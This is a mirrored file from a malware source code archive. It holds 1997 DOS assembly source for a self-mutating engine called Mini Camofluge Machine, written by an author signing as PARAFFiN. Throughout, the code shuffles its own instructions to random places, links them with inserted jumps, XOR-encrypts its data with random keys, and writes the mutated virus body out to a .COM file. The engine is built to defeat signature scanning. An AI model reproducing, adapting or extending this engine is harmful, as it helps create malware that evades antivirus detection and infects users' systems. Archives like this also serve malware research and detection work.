mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
384 lines
18 KiB
NASM
384 lines
18 KiB
NASM
|
.model tiny
|
|||
|
codeseg
|
|||
|
.8086
|
|||
|
org 100h
|
|||
|
; Mini Camofluge Machine v 0.62
|
|||
|
; (c) 1997 by Pashkovsky Maxim [PARAFFiN]
|
|||
|
;-----------------------------C-O-D-E----------------------------------------
|
|||
|
LengthVirus equ (EndVir-Start)*2
|
|||
|
;***********************I*N*T*S**********************************************
|
|||
|
start:
|
|||
|
i00: call CryptData
|
|||
|
i01: call InitRandom
|
|||
|
i02: call Infect
|
|||
|
i03: mov ax,4C00h
|
|||
|
i04: int 21h
|
|||
|
;============================================================================
|
|||
|
InitRandom proc near
|
|||
|
i05: push es
|
|||
|
i06: mov ax,0040h
|
|||
|
i07: mov es,ax
|
|||
|
i08: mov ax,es:[006ch]
|
|||
|
i09: mov word ptr cs:[rseed],ax
|
|||
|
i10: pop es
|
|||
|
i11: ret
|
|||
|
InitRandom endp
|
|||
|
;============================================================================
|
|||
|
Random proc near ; 16 bit Random number
|
|||
|
i12: push cx
|
|||
|
i13: push bx
|
|||
|
i14: mov bx,word ptr cs:[rvalue]
|
|||
|
i15: mov ax,word ptr cs:[rseed]
|
|||
|
i16: rol ax,1
|
|||
|
i17: sub ax,7
|
|||
|
i18: xor ax,bx
|
|||
|
i19: mov word ptr cs:[rvalue],ax
|
|||
|
i20: mov word ptr cs:[rseed],bx
|
|||
|
i21: mul dx ;(input value) * (delta)
|
|||
|
i22: mov cx,-1
|
|||
|
i23: cmp dx,cx ;verify divide will work
|
|||
|
i24: jae @abort ;jmp if divide will not work
|
|||
|
i25: div cx ;(input value) * (delta) / ffffh
|
|||
|
i26: @abort: pop bx
|
|||
|
i27: pop cx
|
|||
|
i28: ret
|
|||
|
Random endp
|
|||
|
;============================================================================
|
|||
|
VerifyAlloc proc near ; Verify place.
|
|||
|
i29: push ax
|
|||
|
i30: push cx
|
|||
|
i31: mov ax,word ptr cs:[AddrPTR]
|
|||
|
i32: mov bx,offset AddrTab
|
|||
|
i33: sub ax,bx
|
|||
|
i34: push dx ;<=<3D>
|
|||
|
i35: mov cx,2AABh ; | divide ax by 6 = ax/6
|
|||
|
i36: mul cx ; :
|
|||
|
i37: mov cx,dx ; |
|
|||
|
i38: pop dx ;<=<3D>
|
|||
|
i39: @vloop: mov ax,word ptr cs:[bx]
|
|||
|
i40: cmp dx,ax
|
|||
|
i41: jb @vnext
|
|||
|
i42: add ax,word ptr cs:[bx+2]
|
|||
|
i43: cmp dx,ax
|
|||
|
i44: jb @verror
|
|||
|
i45: @vnext: add bx,6
|
|||
|
i46: loop @vloop
|
|||
|
i47: clc
|
|||
|
i48: jmp @vquit
|
|||
|
i49: @verror: stc
|
|||
|
i50: @vquit: pop cx
|
|||
|
i51: pop ax
|
|||
|
i52: ret
|
|||
|
VerifyAlloc endp
|
|||
|
;============================================================================
|
|||
|
Jump proc near ; Make near jump (E9h opcode) to free random place.
|
|||
|
i53: push ax
|
|||
|
i54: mov bx,word ptr cs:[AddrPTR]
|
|||
|
i55: mov word ptr cs:[bx],di
|
|||
|
i56: mov word ptr cs:[bx+2],3
|
|||
|
i57: mov word ptr cs:[bx+4],0
|
|||
|
i58: add word ptr cs:[AddrPTR],6
|
|||
|
i59: mov al,0E9h
|
|||
|
i60: stosb
|
|||
|
i61: @jnew: mov dx,0FFFDh
|
|||
|
i62: call Random
|
|||
|
i63: mov dx,di
|
|||
|
i64: add dx,2
|
|||
|
i65: add dx,ax
|
|||
|
i66: cmp dx,offset code + LengthVirus - 10
|
|||
|
i67: jae @jnew
|
|||
|
i68: cmp dx,offset code
|
|||
|
i69: jbe @jnew
|
|||
|
i70: xor cx,cx
|
|||
|
i71: mov bx,word ptr cs:[LenghtPTR]
|
|||
|
i72: mov cl,byte ptr cs:[bx]
|
|||
|
i73: add cx,3
|
|||
|
i74: @jverify: call VerifyAlloc ; Verify place.
|
|||
|
i75: jc @jnew
|
|||
|
i76: inc dx
|
|||
|
i77: loop @jverify
|
|||
|
i78: @jend: stosw
|
|||
|
i79: add di,ax
|
|||
|
i80: pop ax
|
|||
|
i81: ret
|
|||
|
Jump endp
|
|||
|
;============================================================================
|
|||
|
JumpNear proc near ;Proc for adjust near jump.
|
|||
|
i82: push ax
|
|||
|
i83: mov bx,word ptr cs:[AddrPTR]
|
|||
|
i84: mov word ptr cs:[bx],di ; Build table for near jumps.
|
|||
|
i85: mov word ptr cs:[bx+2],2
|
|||
|
i86: mov word ptr cs:[bx+4],si
|
|||
|
i87: add word ptr cs:[AddrPTR],6
|
|||
|
i88: movsb
|
|||
|
i89: @jnnew: xor ax,ax
|
|||
|
i90: mov dx,0FDh
|
|||
|
i91: call Random
|
|||
|
i92: cmp al,20
|
|||
|
i93: jb @jnnew
|
|||
|
i94: cbw
|
|||
|
i95: mov dx,di
|
|||
|
i96: inc dx
|
|||
|
i97: add dx,ax
|
|||
|
i98: cmp dx,offset code + LengthVirus - 10
|
|||
|
i99: jae @jnnew
|
|||
|
i100: cmp dx,offset code
|
|||
|
i101: jbe @jnnew
|
|||
|
i102: mov cx,3
|
|||
|
i103: @jnverify: call VerifyAlloc ; Verify place.
|
|||
|
i104: jc @jnnew
|
|||
|
i105: inc dx
|
|||
|
i106: loop @jnverify
|
|||
|
i107: stosb
|
|||
|
i108: push di
|
|||
|
i109: add di,ax
|
|||
|
i110: mov bx,word ptr cs:[AddrPTR]
|
|||
|
i111: mov word ptr cs:[bx],di
|
|||
|
i112: mov word ptr cs:[bx+2],3
|
|||
|
i113: mov word ptr cs:[bx+4],0
|
|||
|
i114: add word ptr cs:[AddrPTR],6
|
|||
|
i115: mov al,0E9h
|
|||
|
i116: stosb
|
|||
|
i117: lodsb
|
|||
|
i118: cbw
|
|||
|
i119: push si
|
|||
|
i120: add si,ax
|
|||
|
i121: lodsb
|
|||
|
i122: cmp al,0E9h
|
|||
|
i123: jne @jnnext
|
|||
|
i124: lodsw
|
|||
|
i125: add si,ax
|
|||
|
i126: inc si
|
|||
|
i127: @jnnext: dec si
|
|||
|
i128: mov bx,word ptr cs:[JumpPTR] ;Near jump table.
|
|||
|
i129: mov word ptr cs:[bx],si
|
|||
|
i130: mov word ptr cs:[bx+2],di
|
|||
|
i131: add word ptr cs:[JumpPTR],4
|
|||
|
i132: pop si
|
|||
|
i133: pop di
|
|||
|
i134: pop ax
|
|||
|
i135: ret
|
|||
|
JumpNear endp
|
|||
|
;============================================================================
|
|||
|
CallNear proc near ;Build addr table for near call.
|
|||
|
i136: mov bx,word ptr cs:[JumpPTR]
|
|||
|
i137: mov cx,si
|
|||
|
i138: add cx,3 ;inc cx
|
|||
|
i139: add cx,word ptr cs:[si+1]
|
|||
|
i140: mov word ptr cs:[bx],cx
|
|||
|
i141: mov word ptr cs:[bx+2],di
|
|||
|
i142: inc word ptr cs:[bx+2]
|
|||
|
i143: add word ptr cs:[JumpPTR],4
|
|||
|
i144: ret
|
|||
|
CallNear endp
|
|||
|
;============================================================================
|
|||
|
MoveInst proc near ;Move instruction on new place.
|
|||
|
i145: cmp si,word ptr cs:[CryptMov] ; Verify CryptValue
|
|||
|
i146: jne @NoValue
|
|||
|
i147: mov word ptr cs:[OldCryptMov],si
|
|||
|
i148: mov word ptr cs:[CryptMov],di
|
|||
|
i149: jmp @NoCrypt
|
|||
|
i150: @NoValue: cmp si,word ptr cs:[CryptChg] ; Verify ChangeCrypt
|
|||
|
i151: jne @NoCrypt
|
|||
|
i152: mov word ptr cs:[OldCryptChg],si
|
|||
|
i153: mov word ptr cs:[CryptChg],di
|
|||
|
i154: @NoCrypt: mov bx,word ptr cs:[LenghtPTR] ;====================
|
|||
|
i155: xor cx,cx
|
|||
|
i156: mov cl,byte ptr cs:[bx]
|
|||
|
i157: mov bx,word ptr cs:[AddrPTR]
|
|||
|
i158: mov word ptr cs:[bx],di ;Build table for instr.
|
|||
|
i159: mov word ptr cs:[bx+2],cx
|
|||
|
i160: mov word ptr cs:[bx+4],si
|
|||
|
i161: add word ptr cs:[AddrPTR],6
|
|||
|
i162: rep movsb
|
|||
|
i163: ret
|
|||
|
MoveInst endp
|
|||
|
;============================================================================
|
|||
|
Mutation proc near ;Main loop of mutation.
|
|||
|
i164: mov si,offset start ; SI have OLD! code offset.
|
|||
|
i165: mov di,offset code ; DI have NEW! code offset.
|
|||
|
i166: mov ax,offset EndData-offset LenghtTab-1
|
|||
|
i167: cld
|
|||
|
i168: @m1: cmp byte ptr cs:[si],70h ;<=<3D>
|
|||
|
i169: jb @m2 ; | jumps.
|
|||
|
i170: cmp byte ptr cs:[si],7Fh ;<=<3D>
|
|||
|
i171: jbe @realloc
|
|||
|
i172: @m2: cmp byte ptr cs:[si],0E0h
|
|||
|
i173: jb @m3
|
|||
|
i174: cmp byte ptr cs:[si],0E3h
|
|||
|
i175: jbe @realloc
|
|||
|
i176: @m3: cmp byte ptr cs:[si],0EBh ; short jump.
|
|||
|
i177: je @realloc
|
|||
|
i178: cmp byte ptr cs:[si],0E8h ; near call.
|
|||
|
i179: jne @m4
|
|||
|
i180: call CallNear
|
|||
|
i181: @m4: cmp byte ptr cs:[si],0E9h ; NEAR JUMP !!!
|
|||
|
i182: jne @mend
|
|||
|
i183: mov bx,word ptr cs:[si+1]
|
|||
|
i184: add si,3
|
|||
|
i185: add si,bx
|
|||
|
i186: jmp @m1
|
|||
|
i187: @realloc: call JumpNear
|
|||
|
i188: jmp @mnext
|
|||
|
i189: @mend: call MoveInst
|
|||
|
i190: @mnext: inc word ptr cs:[LenghtPTR]
|
|||
|
i191: mov dx,di
|
|||
|
i192: mov cx,3
|
|||
|
i193: mov bx,word ptr cs:[LenghtPTR]
|
|||
|
i194: add cl,byte ptr cs:[bx]
|
|||
|
i195: @mjverify: call VerifyAlloc ; Verify place.
|
|||
|
i196: jc @mjump
|
|||
|
i197: inc dx
|
|||
|
i198: loop @mjverify
|
|||
|
i199: cmp dx,offset code + LengthVirus - 10
|
|||
|
i200: jae @mjump
|
|||
|
i201: push ax
|
|||
|
i202: mov dx,3h
|
|||
|
i203: call Random
|
|||
|
i204: cmp al,1h
|
|||
|
i205: pop ax
|
|||
|
i206: jne @loop
|
|||
|
i207: @mjump: call Jump
|
|||
|
i208: @loop: dec ax
|
|||
|
i209: jnz @m1 ;============================================
|
|||
|
i210: mov dx,word ptr cs:[JumpPTR] ; Adjust address.
|
|||
|
i211: mov bx,offset JumpTab
|
|||
|
i212: sub dx,bx
|
|||
|
i213: shr dx,1 ; div 4
|
|||
|
i214: shr dx,1 ; <=<3D>
|
|||
|
i215: @mreall: mov di,offset AddrTab
|
|||
|
i216: mov ax,word ptr cs:[bx]
|
|||
|
i217: mov cx,word ptr cs:[AddrPTR]
|
|||
|
i218: sub cx,di
|
|||
|
i219: shr cx,1
|
|||
|
i220: repnz scasw
|
|||
|
i221: jcxz @merror
|
|||
|
i222: mov ax,word ptr cs:[di-6]
|
|||
|
i223: mov di,word ptr cs:[bx+2]
|
|||
|
i224: sub ax,di
|
|||
|
i225: sub ax,2
|
|||
|
i226: stosw
|
|||
|
i227: @merror: add bx,4
|
|||
|
i228: dec dx
|
|||
|
i229: jnz @mreall ;========================================
|
|||
|
i230: mov word ptr cs:[LenghtPTR],offset LenghtTab
|
|||
|
i231: mov word ptr cs:[AddrPTR],offset AddrTab
|
|||
|
i232: mov word ptr cs:[JumpPTR],offset JumpTab
|
|||
|
i233: mov dx,0FFFFh ; Adjust CryptValue.
|
|||
|
i234: call Random
|
|||
|
i235: mov bx,word ptr cs:[CryptMov]
|
|||
|
i236: mov [bx+1],ax
|
|||
|
i237: sub word ptr cs:[CryptMov],offset Code-100h
|
|||
|
i238: mov bx,word ptr cs:[OldCryptMov]
|
|||
|
i239: mov [bx+1],ax ;<===========================
|
|||
|
i240: mov dx,0FFFFh ; Adjust ChangeValue.
|
|||
|
i241: call Random
|
|||
|
i242: mov bx,word ptr cs:[CryptChg]
|
|||
|
i243: mov [bx+2],ax
|
|||
|
i244: sub word ptr cs:[CryptChg],offset Code-100h
|
|||
|
i245: mov bx,word ptr cs:[OldCryptChg]
|
|||
|
i246: mov [bx+2],ax ;<===========================
|
|||
|
i247: call CryptData ; Crypt.
|
|||
|
i248: mov si,offset Data ; Move data.
|
|||
|
i249: mov di,offset AddrTab ; NewData;
|
|||
|
i250: mov cx,EndData-Data
|
|||
|
i251: rep movsb
|
|||
|
i252: ret
|
|||
|
Mutation endp
|
|||
|
;============================================================================
|
|||
|
Infect proc near
|
|||
|
i253: call Message
|
|||
|
i254: mov dx,offset FileName ;Open File
|
|||
|
i255: mov ah,3ch
|
|||
|
i256: xor cx,cx
|
|||
|
i257: int 21h
|
|||
|
i258: mov word ptr cs:[FileHandle],ax
|
|||
|
i259: call Mutation
|
|||
|
i260: mov bx,word ptr cs:[FileHandle] ;Write Virus body
|
|||
|
i261: mov cx,offset EndData - 100h ;offset JumpTab + 512 - 100h
|
|||
|
i262: mov dx,offset Code
|
|||
|
i263: mov ah,40h
|
|||
|
i264: int 21h
|
|||
|
i265: mov bx,word ptr cs:[FileHandle] ;Close file
|
|||
|
i266: mov ah,3Eh
|
|||
|
i267: int 21h
|
|||
|
i268: ret
|
|||
|
Infect endp
|
|||
|
;============================================================================
|
|||
|
Message proc near
|
|||
|
i269: mov dx,offset Copyright
|
|||
|
i270: mov ah,09h
|
|||
|
i271: int 21h
|
|||
|
i272: ret
|
|||
|
Message endp
|
|||
|
;============================================================================
|
|||
|
CryptData proc near ; Crypt data body.
|
|||
|
i273: mov cx,(EndData-Data)/2+1
|
|||
|
i274: mov si,offset Data
|
|||
|
i275: push si
|
|||
|
i276: pop di
|
|||
|
i277: CryptValue db 0BAh,?,? ;mov dx,??h
|
|||
|
i278: @DeCrypt: lodsw
|
|||
|
i279: xor ax,dx
|
|||
|
i280: stosw
|
|||
|
i281: ChangeValue db 81h,0C2h,?,? ;add dx,??h
|
|||
|
i282: loop @DeCrypt
|
|||
|
i283: ret
|
|||
|
i284:
|
|||
|
CryptData endp
|
|||
|
;============================================================================
|
|||
|
EndVir:
|
|||
|
org LengthVirus+100h ;$+300h
|
|||
|
;---------------------------------D-A-T-A------------------------------------
|
|||
|
Data:
|
|||
|
Copyright db '[MCMv0.62(c)Jul1997byPARAFFiN]','$'
|
|||
|
FileName db 'test_mcm.com',0
|
|||
|
LenghtPTR dw offset LenghtTab
|
|||
|
AddrPTR dw offset AddrTab
|
|||
|
JumpPTR dw offset JumpTab
|
|||
|
CryptMov dw offset CryptValue
|
|||
|
CryptChg dw offset ChangeValue
|
|||
|
LenghtTab: ; Instruction lenght table.
|
|||
|
db i01-i00,i02-i01,i03-i02,i04-i03,i05-i04,i06-i05,i07-i06,i08-i07,i09-i08,i10-i09
|
|||
|
db i11-i10,i12-i11,i13-i12,i14-i13,i15-i14,i16-i15,i17-i16,i18-i17,i19-i18,i20-i19
|
|||
|
db i21-i20,i22-i21,i23-i22,i24-i23,i25-i24,i26-i25,i27-i26,i28-i27,i29-i28,i30-i29
|
|||
|
db i31-i30,i32-i31,i33-i32,i34-i33,i35-i34,i36-i35,i37-i36,i38-i37,i39-i38,i40-i39
|
|||
|
db i41-i40,i42-i41,i43-i42,i44-i43,i45-i44,i46-i45,i47-i46,i48-i47,i49-i48,i50-i49
|
|||
|
db i51-i50,i52-i51,i53-i52,i54-i53,i55-i54,i56-i55,i57-i56,i58-i57,i59-i58,i60-i59
|
|||
|
db i61-i60,i62-i61,i63-i62,i64-i63,i65-i64,i66-i65,i67-i66,i68-i67,i69-i68,i70-i69
|
|||
|
db i71-i70,i72-i71,i73-i72,i74-i73,i75-i74,i76-i75,i77-i76,i78-i77,i79-i78,i80-i79
|
|||
|
db i81-i80,i82-i81,i83-i82,i84-i83,i85-i84,i86-i85,i87-i86,i88-i87,i89-i88,i90-i89
|
|||
|
db i91-i90,i92-i91,i93-i92,i94-i93,i95-i94,i96-i95,i97-i96,i98-i97,i99-i98,i100-i99
|
|||
|
db i101-i100,i102-i101,i103-i102,i104-i103,i105-i104,i106-i105,i107-i106,i108-i107,i109-i108,i110-i109
|
|||
|
db i111-i110,i112-i111,i113-i112,i114-i113,i115-i114,i116-i115,i117-i116,i118-i117,i119-i118,i120-i119
|
|||
|
db i121-i120,i122-i121,i123-i122,i124-i123,i125-i124,i126-i125,i127-i126,i128-i127,i129-i128,i130-i129
|
|||
|
db i131-i130,i132-i131,i133-i132,i134-i133,i135-i134,i136-i135,i137-i136,i138-i137,i139-i138,i140-i139
|
|||
|
db i141-i140,i142-i141,i143-i142,i144-i143,i145-i144,i146-i145,i147-i146,i148-i147,i149-i148,i150-i149
|
|||
|
db i151-i150,i152-i151,i153-i152,i154-i153,i155-i154,i156-i155,i157-i156,i158-i157,i159-i158,i160-i159
|
|||
|
db i161-i160,i162-i161,i163-i162,i164-i163,i165-i164,i166-i165,i167-i166,i168-i167,i169-i168,i170-i169
|
|||
|
db i171-i170,i172-i171,i173-i172,i174-i173,i175-i174,i176-i175,i177-i176,i178-i177,i179-i178,i180-i179
|
|||
|
db i181-i180,i182-i181,i183-i182,i184-i183,i185-i184,i186-i185,i187-i186,i188-i187,i189-i188,i190-i189
|
|||
|
db i191-i190,i192-i191,i193-i192,i194-i193,i195-i194,i196-i195,i197-i196,i198-i197,i199-i198,i200-i199
|
|||
|
db i201-i200,i202-i201,i203-i202,i204-i203,i205-i204,i206-i205,i207-i206,i208-i207,i209-i208,i210-i209
|
|||
|
db i211-i210,i212-i211,i213-i212,i214-i213,i215-i214,i216-i215,i217-i216,i218-i217,i219-i218,i220-i219
|
|||
|
db i221-i220,i222-i221,i223-i222,i224-i223,i225-i224,i226-i225,i227-i226,i228-i227,i229-i228,i230-i229
|
|||
|
db i231-i230,i232-i231,i233-i232,i234-i233,i235-i234,i236-i235,i237-i236,i238-i237,i239-i238,i240-i239
|
|||
|
db i241-i240,i242-i241,i243-i242,i244-i243,i245-i244,i246-i245,i247-i246,i248-i247,i249-i248,i250-i249
|
|||
|
db i251-i250,i252-i251,i253-i252,i254-i253,i255-i254,i256-i255,i257-i256,i258-i257,i259-i258,i260-i259
|
|||
|
db i261-i260,i262-i261,i263-i262,i264-i263,i265-i264,i266-i265,i267-i266,i268-i267,i269-i268,i270-i269
|
|||
|
db i271-i270,i272-i271,i273-i272,i274-i273,i275-i274,i276-i275,i277-i276,i278-i277,i279-i278,i280-i279
|
|||
|
db i281-i280,i282-i281,i283-i282,i284-i283,0;i285-i284,i286-i285,i287-i286,i288-i287,i289-i288,i290-i289
|
|||
|
;db i291-i290,i292-i291,i293-i292,i294-i293,i295-i294,i296-i295,i297-i296,i298-i297,i299-i298,i300-i299
|
|||
|
;db i301-i300,i302-i301,i303-i302,i304-i303,i305-i304,i306-i305,i307-i306,i308-i307,i309-i308,i310-i309
|
|||
|
EndData:
|
|||
|
; Official data.
|
|||
|
RSeed dw ?
|
|||
|
RValue dw ?
|
|||
|
FileHandle dw ?
|
|||
|
OldCryptMov dw ?
|
|||
|
OldCryptChg dw ?
|
|||
|
Code db LengthVirus dup(?)
|
|||
|
AddrTab db 0B00h dup(?)
|
|||
|
JumpTab db 300h dup(?)
|
|||
|
end start
|